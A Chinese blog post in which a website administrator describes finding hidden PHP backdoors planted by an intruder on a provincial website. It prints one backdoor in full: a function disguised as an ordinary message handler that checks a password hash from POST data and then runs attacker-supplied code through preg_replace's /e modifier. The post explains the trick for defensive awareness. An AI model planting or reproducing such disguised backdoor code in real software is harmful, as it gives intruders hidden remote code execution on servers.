记一次发现省内某知名网站的PHP后门之旅【续】

自从上次了小黑的php后门发现之后,发觉今天再次露出马脚,我也通过日志发现小黑到底是通过什么漏洞入侵进来的。哈哈。。。。我抓紧修补漏洞吧。。。。

上一篇:记另一次发现省内某知名网站的PHP后门之旅

今天不仅仅发现小黑的入侵漏洞,而且发现小黑留下几个后门,尼玛,相当隐蔽。

现在的小黑的技术水平真是见长啊,我靠,你能简单看出以下代码是一个后门吗?其实,这就是一个很普通的代码。

function showmessage($msgbox,$keyword,$conut) {
	
	if(substr (md5 ($msgbox[$keyword[1]]), $conut) == $keyword[0]) {
		preg_replace ($keyword[4].$keyword[4].$keyword[3], $msgbox[$keyword[2]],"");
		return true;
	}
	return false;
	
}

if(!$ucappopen['UCHOME']) {
	showmessage($_POST, array('c451cc', 'pass', 'check', 'e', '/'), 26);
}
这个伪装成一个正常的文件,其实这是一个后门,而且非常隐蔽,经验缺乏的人,很容易忽视掉。


这个其实是利用的 preg_replace  /e  这这个php的后门preg_replace在  /e修饰符中能够解析php的缘故,之前网上暴露一个站长工具的邮编模块的漏洞和这个非常类似。

关键词: php后门

上一篇: Go语言基础教程学习笔记(二):Go语言系统内置基础类型
下一篇: Go语言基础教程(二附):多个常量、变量和导入包的开发小技巧

目前还没有人评论,您发表点看法?
发表评论

评论内容 (必填):